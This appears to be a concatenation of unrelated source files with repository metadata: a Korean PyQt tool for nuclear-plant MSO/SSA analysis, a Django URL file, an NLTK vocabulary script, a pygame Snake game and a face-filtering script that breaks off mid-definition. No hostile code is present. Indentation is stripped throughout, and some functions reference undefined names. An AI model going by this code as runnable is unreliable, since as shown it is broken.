from PyQt5.QtWidgets import QMessageBox, QComboBox, QTabWidget, QFileDialog
from PyQt5.QtWidgets import QFormLayout, QPushButton, QVBoxLayout, QHBoxLayout
from Component.Shortcut import Shortcut
from Component.Materials import Checkbox
from Component.Materials import CheckboxItem
from Component.Projects.AreaTab import AreaTab
from Component.Projects.CableTab import CableTab
from Component.Projects.EquipTab import EquipTab
from Component.Projects.LogicTap import LogicTab
from Component.Projects.AnalysTab import AnalysTab
from Component.Project import Project
from Excel.Import import Import
from Excel.Export import Export
import shutil
import os
__author__ = "Wonyeong Choe <choewy@stdte.co.kr>"
class Windows(QWidget):
def __init__(self):
QWidget.__init__(self)
self.dirs = ['']+os.listdir('Data')
self.dirs.remove('Origin')
self.db_name = ''
self.__setting__()
self.__component__()
def __setting__(self):
self.setWindowTitle('원전 MSO, SSA 분석 프로그램')
self.setMinimumWidth(800)
self.setMinimumHeight(800)
self.geometry().center()
self.showMaximized()
self.setWindowIcon(QIcon('icon.ico'))
def __component__(self):
self.__menubar__()
self.__combobox__()
self.__pushbutton__()
self.__tab__()
self.__layout__()
def __menubar__(self):
action_version = QAction('프로그램 정보', self)
self.action_shortcut = QAction('단축키 정보', self)
action_exit = QAction('닫기', self)
action_exit.setShortcut('Ctrl+Q')
action_version.triggered.connect(self.Version)
self.action_shortcut.triggered.connect(self.Shortcut)
action_exit.triggered.connect(self.Exit)
menu_main = QMenu('메뉴', self)
menu_main.addAction(action_version)
menu_main.addAction(self.action_shortcut)
menu_main.addSeparator()
menu_main.addAction(action_exit)
action_new = QAction('새 프로젝트', self)
action_new.setShortcut('Ctrl+N')
action_admin = QAction('프로젝트 관리', self)
action_admin.setShortcut('Ctrl+M')
action_refresh = QAction('새로고침', self)
action_refresh.setShortcut('F5')
action_new.triggered.connect(self.New)
action_admin.triggered.connect(self.Admin)
action_refresh.triggered.connect(self.Refresh)
menu_project = QMenu('프로젝트', self)
menu_project.addAction(action_new)
menu_project.addAction(action_admin)
menu_project.addAction(action_refresh)
self.menubar = QMenuBar(self)
self.menubar.addMenu(menu_main)
self.menubar.addMenu(menu_project)
def New(self):
self.lineedit_project = QLineEdit()
self.button_close = QPushButton('닫기')
self.button_create = QPushButton('생성')
self.button_create.setDefault(True)
self.button_close.clicked.connect(self.Close)
self.button_create.clicked.connect(self.Create)
layout_form = QFormLayout()
layout_form.addRow('프로젝트 명', self.lineedit_project)
layout_buttons = QHBoxLayout()
layout_buttons.addWidget(self.button_close)
layout_buttons.addWidget(self.button_create)
layout = QVBoxLayout()
layout.addLayout(layout_form)
layout.addLayout(layout_buttons)
self.dig = QDialog(self)
self.dig.setLayout(layout)
self.dig.setFixedWidth(300)
self.dig.setFixedHeight(100)
self.dig.setWindowTitle('새 프로젝트 생성')
self.dig.exec_()
def __checkbox__(self, table, row, col):
checkboxitem = CheckboxItem()
checkbox = Checkbox(checkboxitem)
checkbox.stateChanged.connect(self.Checked)
table.setItem(row, col, checkboxitem)
table.setCellWidget(row, col, checkbox)
def Checked(self, check):
row = self.table.currentRow()
if check == 2:
self.checked.append(row)
elif check == 0:
self.checked.remove(row)
def Admin(self):
self.checked = []
dirs = ['']+os.listdir('Data')
dirs.remove('Origin')
action_close = QAction('닫기')
action_close.triggered.connect(self.CloseProject)
action_delete = QAction('삭제')
action_delete.setShortcut('Alt+2')
action_delete.triggered.connect(self.DeleteProject)
menubar = QMenuBar()
menubar.addAction(action_close)
menubar.addAction(action_delete)
self.table = QTableWidget()
self.table.setRowCount(0)
self.table.setColumnCount(len(['선택', '프로젝트명']))
self.table.setHorizontalHeaderLabels(['선택', '프로젝트명'])
style = "QTableWidget{color: black;}"
self.table.setStyleSheet(style)
for row, project in enumerate(dirs):
self.table.insertRow(row)
self.table.setRowHeight(row, 50)
self.__checkbox__(self.table, row, 0)
item = QTableWidgetItem(project)
item.setFlags(Qt.ItemIsEditable)
self.table.setItem(row, 1, item)
self.table.resizeColumnsToContents()
self.table.hideRow(0)
self.table.verticalHeader().setVisible(False)
self.table.horizontalHeader().setStretchLastSection(True)
layout = QVBoxLayout()
layout.addWidget(menubar)
layout.addWidget(self.table)
self.dig_project = QDialog(self)
self.dig_project.setLayout(layout)
self.dig_project.setWindowTitle('프로젝트 관리')
self.dig_project.setFixedWidth(400)
self.dig_project.setFixedHeight(800)
self.dig_project.exec_()
def CloseProject(self):
self.dig_project.close()
def DeleteProject(self):
self.checked.sort(reverse=True)
for row in self.checked:
project = self.table.item(row, 1).text()
index = self.dirs.index(project)
current = f"Data/{project}"
shutil.rmtree(current)
self.combobox_project.removeItem(index)
self.dirs.remove(project)
self.table.removeRow(row)
self.checked.clear()
def Refresh(self):
index = self.project.currentIndex()
self.project.clear()
self.project.addTab(AreaTab(self.db_name, self, self.Refresh), '방화지역')
self.project.addTab(EquipTab(self.db_name, self, self.Refresh), '기기')
self.project.addTab(CableTab(self.db_name, self, self.Refresh), '케이블')
self.project.addTab(LogicTab(self.db_name, self, self.Refresh), '논리')
self.project.addTab(AnalysTab(self.db_name, self, self.Refresh), '분석')
self.project.setCurrentIndex(index)
def Version(self):
pixmap = QPixmap('logo.png').scaledToWidth(300)
label_logo = QLabel()
label_logo.setPixmap(pixmap)
label_logo.setAlignment(Qt.AlignCenter)
label_title = QLabel('<h3>원전 MSO, SSA 분석 프로그램 V1.0</h3>')
label_title.setAlignment(Qt.AlignCenter)
layout_head = QVBoxLayout()
layout_head.addWidget(QLabel('소 속 :'))
layout_head.addWidget(QLabel('개 발 자 :'))
layout_head.addWidget(QLabel('제 작 일 :'))
layout_head.addWidget(QLabel('개 요 :'))
layout_head.addWidget(QLabel(''))
layout_content = QVBoxLayout()
layout_content.addWidget(QLabel('(주)스탠더드시험연구소'))
layout_content.addWidget(QLabel('최원영'))
layout_content.addWidget(QLabel('2019-06-10'))
layout_content.addWidget(QLabel('본 프로그램은 (주)스탠더드시험연구소에서 자체적으로 개발한'))
layout_content.addWidget(QLabel('원전 다중오동작(MSO), 안전정지(SSA) 분석을 위한 프로그램입니다.'))
layout_info = QHBoxLayout()
layout_info.addLayout(layout_head)
layout_info.addLayout(layout_content)
layout = QVBoxLayout()
layout.addWidget(label_title)
layout.addWidget(QLabel(''))
layout.addLayout(layout_info)
layout.addWidget(QLabel(''))
layout.addWidget(label_logo)
self.dig_version = QDialog(self)
self.dig_version.setStyleSheet('QDialog{background: white;}')
self.dig_version.setWindowTitle('프로그램 정보')
self.dig_version.setLayout(layout)
self.dig_version.setFixedWidth(460)
self.dig_version.setFixedHeight(280)
self.dig_version.exec_()
def Shortcut(self):
idx = self.tab.count()
self.tab.addTab(Shortcut(), '단축키 정보')
self.tab.setCurrentIndex(idx)
self.action_shortcut.setEnabled(False)
def Exit(self):
self.close()
def Create(self):
db_name = self.lineedit_project.text()
if db_name == '':
QMessageBox.question(self, '오류', '프로젝트 이름을 입력하세요.', QMessageBox.Close)
elif os.path.isdir(f"Data/{db_name}"):
QMessageBox.question(self, '오류', '이미 존재하는 프로젝트입니다.', QMessageBox.Close)
elif db_name != '':
self.dirs.append(db_name)
origin = os.listdir("Data/Origin")
os.makedirs(f"Data/{db_name}")
for index, db in enumerate(origin):
origin_db = f"Data/Origin/{db}"
new_db = f"Data/{db_name}/{db}"
shutil.copy(origin_db, new_db)
self.dig.close()
self.combobox_project.addItems([f'{db_name}'])
def Close(self):
self.dig.close()
def __combobox__(self):
self.combobox_project = QComboBox()
self.combobox_project.addItems(self.dirs)
def __pushbutton__(self):
self.button_project = QPushButton('열기')
self.button_project.clicked.connect(self.Open)
self.button_import = QPushButton('업로드')
self.button_import.clicked.connect(self.Import)
self.button_import.setVisible(False)
self.button_export = QPushButton('다운로드')
self.button_export.clicked.connect(self.Export)
self.button_export.setVisible(False)
def Open(self):
self.db_name = self.combobox_project.currentText()
count = self.tab.count()
tab_bars = []
if count != 0:
for idx in range(count):
text = self.tab.tabText(idx)
tab_bars.append(text)
if self.db_name == '':
self.button_import.setVisible(False)
self.button_export.setVisible(False)
elif self.db_name != '' and self.db_name not in tab_bars:
self.project = Project(self.db_name, self.Refresh)
self.tab.addTab(self.project, self.db_name)
self.tab.setCurrentIndex(self.tab.currentIndex()+1)
self.button_import.setVisible(True)
self.button_export.setVisible(True)
self.button_import.setShortcut('Ctrl+I')
self.button_export.setShortcut('Ctrl+E')
def Import(self):
dig_file = QFileDialog(self)
file_name = dig_file.getOpenFileName(self, caption='엑셀 파일 업로드', directory='', filter='*.xlsx')[0]
if file_name != '':
try:
db_path = f"Data/{self.db_name}"
shutil.rmtree(db_path)
os.makedirs(db_path)
Import(self.db_name, file_name)
self.Refresh()
except:
QMessageBox.question(self, '오류', '업로드에 실패하였습니다.\n엑셀 파일의 양식을 확인하세요.', QMessageBox.Close)
def Export(self):
dig_dirs = QFileDialog(self)
file_path = dig_dirs.getSaveFileName(caption='엑셀 파일 다운로드', directory='', filter='*.xlsx')[0]
if file_path != '':
Export(self.db_name, file_path)
self.Refresh()
self.__success_export__(file_path)
def __success_export__(self, file_path):
label_text = QLabel('다운로드가 완료되었습니다.\n')
label_text.setAlignment(Qt.AlignCenter)
self.file_path = file_path
self.button_ignore = QPushButton('닫기')
self.button_open = QPushButton('열기')
self.button_ignore.clicked.connect(self.Ignore_ExcelFile)
self.button_open.clicked.connect(self.Open_ExcelFile)
layout_button = QHBoxLayout()
layout_button.addWidget(self.button_ignore)
layout_button.addWidget(self.button_open)
layout = QVBoxLayout()
layout.addWidget(label_text)
layout.addLayout(layout_button)
self.dig_export = QDialog(self)
self.dig_export.setLayout(layout)
self.dig_export.setWindowTitle('알림')
style = "QDialog{background-color: white;}"
self.dig_export.setFixedWidth(300)
self.dig_export.setFixedHeight(150)
self.dig_export.setStyleSheet(style)
self.dig_export.show()
def Ignore_ExcelFile(self):
self.dig_export.close()
def Open_ExcelFile(self):
os.system(f"start excel.exe {self.file_path}")
self.dig_export.close()
def __tab__(self):
self.tab = QTabWidget()
self.tab.setMovable(True)
self.tab.setTabsClosable(True)
self.tab.tabCloseRequested.connect(self.CloseTab)
def CloseTab(self, index):
self.tab.removeTab(index)
tab_name = self.tab.tabText(index)
if tab_name == '단축키 정보':
self.action_shortcut.setEnabled(True)
def __layout__(self):
layout_project = QHBoxLayout()
layout_project.addWidget(QLabel(' 프로젝트 선택'))
layout_project.addWidget(self.combobox_project, 5)
layout_project.addWidget(self.button_project, 0)
layout_excelfile = QHBoxLayout()
layout_excelfile.addWidget(QLabel(''), 10)
layout_excelfile.addWidget(self.button_import, 1)
layout_excelfile.addWidget(self.button_export, 1)
layout_top = QHBoxLayout()
layout_top.addLayout(layout_project, 5)
layout_top.addLayout(layout_excelfile, 5)
layout = QVBoxLayout()
layout.addWidget(self.menubar, 0)
layout.addLayout(layout_top, 0)
layout.addWidget(self.tab, 10)
self.setLayout(layout)
|
[
"choewy@stdte.co.kr"
] |
choewy@stdte.co.kr
|
1c08ed7ab24404b2203e81b4ad894448a0dedbfd
|
efd4e7d85e2ae17853513e846ffce08288e3ff7b
|
/My_profile/urls.py
|
2abf6fd7317aee120b4a64f0256870f5a5802713
|
[] |
no_license
|
bodawalan/Django_blog
|
e033bbb5547f17b668f2a582f71700f4a1353184
|
43b9505708a18dbb9da28cad020f1ae90d5a0e0e
|
refs/heads/master
| 2021-01-19T11:29:42.448736
| 2017-04-12T20:06:21
| 2017-04-12T20:06:21
| 87,970,789
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 268
|
py
|
from django.conf.urls import url,include
from django.contrib import admin
from My_profile import views
urlpatterns = [
#url(r'^', views.Name_view),
url(r'^address', views.Address_view),
url(r'^contact', views.contact),
url(r'^', views.Name_view),
]
|
[
"nishit687539@gmail.com"
] |
nishit687539@gmail.com
|
d8620bee26ddf112e526f48d44d148a31175bc96
|
87fe3804869e2443c14317d766a5f8716afcd5d5
|
/scripts/form_vocab.py
|
91f0f437c6d7c6af9304603454eb1f3585f4c7c5
|
[] |
no_license
|
heidonomm/mhopRL
|
dbfd296dddf87507f6bb19d58b459a4df181ea57
|
93db4dda4646412f1783a6e05f9b779005539a2f
|
refs/heads/master
| 2023-04-15T04:56:44.464898
| 2021-04-16T07:29:20
| 2021-04-16T07:29:20
| 344,776,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,936
|
py
|
import nltk
from nltk import word_tokenize
from nltk import WordNetLemmatizer
import json
import string
# q_string = '{"id": "3NGI5ARFTT4HNGVWXAMLNBMFA0U1PG", "question": {"stem": "Climate is generally described in terms of what?", "choices": [{"text": "sand", "label": "A"}, {"text": "occurs over a wide range", "label": "B"}, {"text": "forests", "label": "C"}, {"text": "Global warming", "label": "D"}, {"text": "rapid changes occur", "label": "E"}, {"text": "local weather conditions", "label": "F"}, {"text": "measure of motion", "label": "G"}, {"text": "city life", "label": "H"}]}, "answerKey": "F", "fact1": "Climate is generally described in terms of temperature and moisture.", "fact2": "Fire behavior is driven by local weather conditions such as winds, temperature and moisture.", "combinedfact": "Climate is generally described in terms of local weather conditions", "formatted_question": "Climate is generally described in terms of what? (A) sand (B) occurs over a wide range (C) forests (D) Global warming (E) rapid changes occur (F) local weather conditions (G) measure of motion (H) city life"}'
# q_json = json.loads(q_string)
# def state_rep_generator(q_obj):
# state = ""
# elements = list()
# elements.append(preprocess(q_obj["stem"]))
# for choice in q_obj['choices']:
# print(choice['text'])
# elements.append((preprocess(choice['text'])))
# print(elements)
# return "<|>".join(elements)
def preprocess(text):
lemma = WordNetLemmatizer()
tokens = word_tokenize(text)
tokens = [token for token in tokens if token.isalpha()]
tokens = [lemma.lemmatize(word.lower(), pos="v") for word in tokens]
tokens = [lemma.lemmatize(word.lower(), pos="n") for word in tokens]
return tokens
# print(state_rep_generator(q_json['question']))
vocab_set = set()
for letter in string.ascii_lowercase:
vocab_set.add(letter)
# with open("data/QASC_Dataset/dev.jsonl", "r") as in_dev_file, open("toy_data/dev_norm_unique_predicates.txt", "r") as in_pred_file, open("word_vocab.txt", "w") as out_file:
# for line in in_dev_file:
# line = json.loads(line)
# for stem_word in preprocess(line["question"]["stem"]):
# vocab_set.add(stem_word)
# # vocab_set.add(word for word in preprocess(line["question"]["stem"]))
# # choices = [preprocess(choice["text"]) for choice in line["question"]["choices"]]
# for choice in line["question"]["choices"]:
# for choice_word in preprocess(choice["text"]):
# vocab_set.add(choice_word)
# # vocab_set.add(word for word in preprocess(choice["text"]))
# for index, line in enumerate(in_pred_file):
# for word in preprocess(line):
# vocab_set.add(word)
# # vocab_set.add(word for word in preprocess(line))
# for word in vocab_set:
# # print(word)
# out_file.write(f"{word}\n")
|
[
"heidonomm@gmail.com"
] |
heidonomm@gmail.com
|
905d02d242aba18398fcd2c714f97a9507bde437
|
424c3cff38aab3895a277de6a08dc0592ecd42e7
|
/main.py
|
44158692bb56951d5b8312b0c986e74fc8eb21bf
|
[] |
no_license
|
kevinjavila/Snake-Game
|
90718497961d92c268da8ebd5255eb080cc975d2
|
78bc5ba524662209a2a95510839bcd52f7b322c1
|
refs/heads/master
| 2023-08-26T06:57:57.485186
| 2021-10-26T21:05:07
| 2021-10-26T21:05:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,748
|
py
|
import random
import pygame
class Cube:
rows = 20
w = 500
def __init__(self, start, dirnx = 1, dirny = 0, color = (255, 0, 0)):
self.pos = start
self.dirnx = 1
self.dirny = 0
self.color = color
def move(self, dirnx, dirny):
self.dirnx = dirnx
self.dirny = dirny
self.pos = (self.pos[0] + self.dirnx, self.pos[1] + self.dirny)
def draw(self, surface, eyes = False):
dis = self.w // self.rows
i = self.pos[0]
j = self.pos[1]
pygame.draw.rect(surface, self.color, (i*dis+1, j*dis+1, dis - 2, dis - 2)) # Drawing inside squares
if eyes:
center = dis // 2
radius = 3
circle_middle = (i*dis+center-radius, j*dis+8)
circle_middle1 = (i*dis+dis-radius*2, j*dis+8)
pygame.draw.circle(surface, (0,0,0), circle_middle, radius)
pygame.draw.circle(surface, (0,0,0), circle_middle1, radius)
class Snake:
body = []
turns = {}
def __init__(self, color, pos):
self.color = color
# Keeping track of head at position
self.head = Cube(pos)
self.body.append(self.head)
# Directions for moving snake
self.dirnx = 0
self.dirny = 1
def move(self):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
# Holding the key values that can be pressed
keys = pygame.key.get_pressed()
for key in keys:
if keys[pygame.K_LEFT]:
self.dirnx = -1
self.dirny = 0
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
if keys[pygame.K_RIGHT]:
self.dirnx = 1
self.dirny = 0
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
if keys[pygame.K_UP]:
self.dirnx = 0
self.dirny = -1
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
if keys[pygame.K_DOWN]:
self.dirnx = 0
self.dirny = 1
# Setting key (current head) == where we turned
self.turns[self.head.pos[:]] = [self.dirnx, self.dirny]
for i, c in enumerate(self.body):
p = c.pos[:] # position
if p in self.turns:
turn = self.turns[p]
c.move(turn[0], turn[1])
# If on last cube, remove turn
if i == len(self.body) - 1:
self.turns.pop(p)
else:
# Checking whether we are on edge of screen
if c.dirnx == -1 and c.pos[0] <= 0: # if on left side edge, come through right side edge
c.pos = (c.rows - 1, c.pos[1])
elif c.dirnx == 1 and c.pos[0] >= c.rows - 1: # if on right side edge, come through left side
c.pos = (0, c.pos[1])
elif c.dirny == 1 and c.pos[1] >= c.rows - 1: # if on down side edge, come through up side edge
c.pos = (c.pos[0], 0)
elif c.dirny == -1 and c.pos[1] <= 0: # if on up side edge, come through down side edge
c.pos = (c.pos[0], c.rows - 1)
else:
c.move(c.dirnx, c.dirny) # else keep moving
def add_cube(self):
tail = self.body[-1]
dx, dy = tail.dirnx, tail.dirny
# Checking direction of the tail so cube can be added properly
if dx == 1 and dy == 0:
self.body.append(Cube((tail.pos[0] - 1, tail.pos[1]))) # Right
elif dx == -1 and dy == 0:
self.body.append(Cube((tail.pos[0] + 1, tail.pos[1]))) # Left
elif dx == 0 and dy == 1:
self.body.append(Cube((tail.pos[0], tail.pos[1] - 1))) # Down
elif dx == 0 and dy == -1:
self.body.append(Cube((tail.pos[0], tail.pos[1] + 1))) # Up
self.body[-1].dirnx = dx
self.body[-1].dirny = dy
def draw(self, surface):
for i, c in enumerate(self.body):
if i == 0:
c.draw(surface, True)
else:
c.draw(surface)
def draw_grid(width, rows, surface):
size_between = width // rows
x = 0
y = 0
for line in range(rows):
x += size_between
y += size_between
# Draw lines for each iteration of loop
pygame.draw.line(surface, (255,255,255), (x,0), (x, width)) # vertical line
pygame.draw.line(surface, (255, 255, 255), (0, y), (width, y)) # horizontal line
def redraw_window(surface):
global rows, width, s, snack
surface.fill((0, 0, 0))
s.draw(surface)
snack.draw(surface)
draw_grid(width, rows, surface)
pygame.display.update()
def random_snack(rows, item):
positions = item.body
while True:
x = random.randrange(rows)
y = random.randrange(rows)
# Checking if positions are == current position of snake from a filtered list
# Making sure the snack will not be inside of current snake
if len(list(filter(lambda z:z.pos == (x,y), positions))) > 0: # will continue if (values are == to positions) and
continue # greater than 0 using filter and lambda function
else:
break
return (x,y)
def main():
global width, rows, s, snack
pygame.init()
pygame.display.set_caption("Snake")
width = 500
rows = 20
win = pygame.display.set_mode((width, width))
flag = True
# Starting in the middle
s = Snake((255, 0, 0), (10, 10))
snack = Cube(random_snack(rows, s), color = (0,255,0))
clock = pygame.time.Clock()
while flag:
# Delaying the game so it's not as fast
pygame.time.delay(50)
clock.tick(10) # limiting to 10 fps
s.move()
if s.body[0].pos == snack.pos:
s.add_cube()
snack = Cube(random_snack(rows, s), color = (0,255,0))
# Checking for the collision
for i in range(len(s.body)):
# Using map to apply function lambda (variable z) to each item in s.body list
if s.body[i].pos in list(map(lambda z:z.pos, s.body[i + 1:])):
print("Score:", len(s.body))
flag = False
redraw_window(win)
pass
main()
|
[
"kevinavila32@gmail.com"
] |
kevinavila32@gmail.com
|
947921228a07d1818a52f9c16c3e1ce5adc60daa
|
1fe1ee2f53c004f804e9fe69e6615d3897b63615
|
/Snake/scoreboard.py
|
09ce5b4d4a78cabf6605f7dc4adb6329f392d0ca
|
[] |
no_license
|
jguillermo19/Python_Codigos
|
396083da6d807a5af6170b6b7e52537ab530754a
|
b48ebfacacab79c9390a9119992d76ebb10ffbc1
|
refs/heads/main
| 2023-08-18T23:23:45.932209
| 2021-09-15T20:47:44
| 2021-09-15T20:47:44
| 402,956,446
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 798
|
py
|
from turtle import Turtle, update
ALIGNMENT = "center"
FONT = ("Courier",15,"normal")
class Scoreboard(Turtle):
def __init__(self):
super().__init__()
self.score = 0
self.color("white")
self.penup() # No dibujar linea
self.goto(0,270) # Posicion
self.hideturtle() # No aparecer apuntador
self.update_scoreboard()
def update_scoreboard(self): # Actualizar Score
self.write(f"Score {self.score}",align=ALIGNMENT,font=FONT)
def game_over(self): # Juego terminado
self.goto(0,0)
self.write("GAME OVER",align=ALIGNMENT,font=FONT)
def increase_score(self): # Incrementar score
self.score += 1
self.clear()
self.update_scoreboard()
|
[
"jsandovalh1500@alumno.ipn.mx"
] |
jsandovalh1500@alumno.ipn.mx
|
e7df89bb363a64317c365f5f45a13d4c5a2e4096
|
a6c40c08da73bb1c65b48ce62ab6d035aa22fb41
|
/cleaner.py
|
bf4b23c67d8b90905f2535e876ce701dd078ceaa
|
[] |
no_license
|
SebasGarcia08/face-extractor
|
f279915a21fce2170f0b266378da10f7626c94a7
|
d999518b27a19b149b43be494ec68578c38ab033
|
refs/heads/master
| 2022-11-04T20:19:15.528249
| 2020-06-10T15:55:30
| 2020-06-10T15:55:30
| 269,957,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,456
|
py
|
from argparse import ArgumentParser
import insightface
import cv2
import os
import logging
import traceback
import shutil
from tqdm import tqdm, tqdm_gui
import time
import numpy as np
import tensorflow as tf
from tensorflow.keras.applications.mobilenet_v2 import preprocess_input
from tensorflow.keras.preprocessing.image import img_to_array
import multiprocessing
from multiprocessing import Pool
from p_tqdm import p_map
import sys
def main(args):
logging.info(' Reading files in {}'.format(args["INPUT_BASE_DIR"]))
if not args["save_in_same_output_folder"]:
copyDirectoryStructure(args["INPUT_BASE_DIR"], args["OUTPUT_PATH"])
else:
if os.path.exists(args["OUTPUT_PATH"]):
logging.error(" {} path already exists".format(args["OUTPUT_PATH"]))
return
else:
os.mkdir(args["OUTPUT_PATH"])
try:
if os.path.exists(args["INPUT_BASE_DIR"]):
num_imgs = 0
num_faces_detected = 0
num_images_filtered = 0
num_masked_faces_detected = 0
for dirpath, _, filenames in os.walk(args["INPUT_BASE_DIR"]):
for filename in filenames:
num_imgs += 1
pbar = tqdm(total=num_imgs, desc="Progress", unit="Images")
pbar.write(f"{num_imgs} images found")
for img_number, (dirpath, _, filenames) in enumerate(os.walk(args["INPUT_BASE_DIR"])):
for filename in filenames:
try:
partialPath = os.path.sep.join([ dirpath[ len(args["INPUT_BASE_DIR"]): ], filename ])
src = os.path.sep.join([args["INPUT_BASE_DIR"], partialPath])
img = cv2.imread(src)
img = cv2.resize(img, (255, 255))
bbox, _ = model.detect(img, threshold=0.5, scale=1.0)
if len(bbox) > 0:
num_images_filtered += 1
if args["save_in_same_output_folder"]:
out = os.path.sep.join([args["OUTPUT_PATH"], filename])
else:
out = os.path.sep.join([args["OUTPUT_PATH"], partialPath])
if args["keep_only_imgs_with_faces"]:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
elif args["crop_faces"] or args["keep_only_imgs_with_masked_faces"]:
current_num_faces_detected = 0
faces = []
croppedImages = []
for box in bbox:
try:
if args["keep_only_imgs_with_masked_faces"]:
x,y,w,h,_ = list(map(int, box))
imgCrop = img[y:y+h,x:x+w]
croppedImages.append(imgCrop)
face = cv2.cvtColor(imgCrop, cv2.COLOR_BGR2RGB)
face = cv2.resize(face, (224, 224))
face = img_to_array(face)
face = preprocess_input(face)
face = np.expand_dims(face, axis=0)
faces.append(face)
except Exception as e:
# logging.error(traceback.format_exc())
pbar.write(traceback.format_exc())
saveImg = True
if len(faces) > 0:
preds = maskNet.predict(faces)
for i, (imgCrop, pred) in enumerate(zip(croppedImages, preds)):
out = out.replace(".jpg","")
out += f"face_No{str(i+1)}.jpg"
saveCroppedImg = True
if args["crop_faces"]:
if args["keep_only_imgs_with_masked_faces"]:
pMask, pNotMask = np.squeeze(pred)
saveCroppedImg = pMask > .3
if saveCroppedImg:
try:
imgCrop = cv2.resize(imgCrop, (224,224)) #this resizing could rise exception
cv2.imwrite(out, imgCrop)
num_faces_detected += 1
current_num_faces_detected += 1
except:
try:
cv2.imwrite(out, imgCrop) # if so, then save images as is, iwithout resizing
num_faces_detected += 1
current_num_faces_detected += 1
except Exception as e:
pbar.write(str(e))
else:
saveImg = False
if args["duplicate_img_of_faces"]:
if args["keep_only_imgs_with_masked_faces"]:
if len(faces) == 1 and saveImg:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
else:
if args["move_images"]:
shutil.move(src, out)
else:
cv2.imwrite(out, img)
if args["crop_faces"]:
s = " masked" if args["keep_only_imgs_with_masked_faces"] else " "
msg = f"Detected{s} faces: {current_num_faces_detected} - Total: {num_faces_detected} - Percentage of faces over images: {(num_faces_detected/(img_number+1))*100}%"
pbar.write(msg)
else:
pbar.write(f"Filtered images: {num_images_filtered} - Percemtage of saved images: {(num_images_filtered/img_number)*100}%")
pbar.update(1)
except Exception as e:
pbar.write(str(e))
else:
raise FileNotFoundError("Path does not exists")
except Exception as e:
logging.log(40, traceback.format_exc())
def yieldPaths(input_path, output_path, flat=False):
for dirpath, _, filenames in os.walk(input_path):
for filename in filenames:
partialPath = os.path.sep.join([ dirpath[ len(input_path): ], filename])
src = os.path.sep.join([input_path, partialPath])
if flat:
out = os.path.sep.join([output_path, filename])
else:
out = os.path.sep.join([output_path, partialPath])
yield (src, out)
def copyDirectoryStructure(base_path, output_path):
if os.path.exists(base_path):
res = "yes"
for dirpath, _ , _ in os.walk(base_path):
structure = os.path.sep.join([ output_path, dirpath[ len(base_path): ] ])
try:
logging.info(" Creating {} path".format(structure))
if res == "yesAll":
os.makedirs(structure, exist_ok=True)
else:
os.mkdir(structure)
except FileExistsError:
msg = "Path {} already exists, do you want to overwrite it? [yes/no/yesAll/noAll]: ".format(structure)
res = input(msg)
if res == "noAll":
break
if res != "yes" and res != "no" and res != "yesAll" and res != "noAll":
print("Invalid choice")
break
else:
logging.error("File does not exists")
def copyFile(src, dst, buffer_size=10485760, perserveFileDate=True):
'''
From: https://blogs.blumetech.com/blumetechs-tech-blog/2011/05/faster-python-file-copy.html
Copies a file to a new location. Much faster performance than Apache Commons due to use of larger buffer
@param src: Source File
@param dst: Destination File (not file path)
@param buffer_size: Buffer size to use during copy
@param perserveFileDate: Preserve the original file date
'''
# Check to make sure destination directory exists. If it doesn't create the directory
dstParent, dstFileName = os.path.split(dst)
if(not(os.path.exists(dstParent))):
os.makedirs(dstParent)
# Optimize the buffer for small files
buffer_size = min(buffer_size,os.path.getsize(src))
if(buffer_size == 0):
buffer_size = 1024
if shutil._samefile(src, dst):
raise shutil.Error("`%s` and `%s` are the same file" % (src, dst))
for fn in [src, dst]:
try:
st = os.stat(fn)
except OSError:
# File most likely does not exist
pass
else:
# XXX What about other special files? (sockets, devices...)
if shutil.stat.S_ISFIFO(st.st_mode):
raise shutil.SpecialFileError("`%s` is a named pipe" % fn)
with open(src, 'rb') as fsrc:
with open(dst, 'wb') as fdst:
shutil.copyfileobj(fsrc, fdst, buffer_size)
if(perserveFileDate):
shutil.copystat(src, dst)
def countImages(input_path):
total_images = 0
for _, _, filenames in os.walk(input_path):
total_images += len(filenames)
return total_images
def write(msg):
sys.stderr.write('\r{}'.format(msg))
def run(src, out):
try:
img = cv2.imread(src)
img = cv2.resize(img, (255, 255))
bbox, _ = self.model.detect(img, threshold=0.5, scale=1.0)
if len(bbox) > 0:
if move_files:
shutil.move(src, out)
else:
self.copyFile(src, out)
num_filtered_images += 1
ratio = round((self.num_filtered_images / (img_number + 1)) * 100, 3)
self.write("Filtered imgs: {}| % Imgs saved: {}".format( self.num_filtered_images, ratio))
except Exception as e:
self.write(str(e))
def filterFace():
pass
if __name__ == '__main__':
# Initialize parser
parser = ArgumentParser(
description="Script for detecting faces in a given folder and its subdirectories"
)
parser.add_argument("-in", "--input-path",
type=str,
required=True,
dest="INPUT_BASE_DIR",
help="Path to the directory where images or folders of images are\n")
parser.add_argument("-out","--output-path",
type=str,
required=True,
dest = "OUTPUT_PATH",
help="Path of the folder where faces images will be saved\n")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("--keep-faces",
action="store_true",
dest="keep_only_imgs_with_faces",
help = "Set the keeping criteria to images with faces. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces")
group.add_argument("--keep-faces-with-mask",
action="store_true",
dest="keep_only_imgs_with_masked_faces",
help = "Set the keeping criteria to images with faces that wear mask. Whether to keep images stored from [-out, --output-path] to [-in, --input-path] only if contain faces with mask")
parser.add_argument("-move", "--move-kept-images",
action="store_true",
default=False,
dest = "move_images",
help = "Whether to move kept images from [-in, --input-path] to [-out, --output-path] in such a way that in the remaining images in [-in --input-path] are the ones that did not apply the criteria.")
parser.add_argument("-crop","--crop-faces",
action='store_true',
dest="crop_faces",
default=False,
help="Crop faces detected in images and save each one\n")
parser.add_argument("-flat", "--same-out-dir",
action='store_true',
dest="save_in_same_output_folder",
default=False,
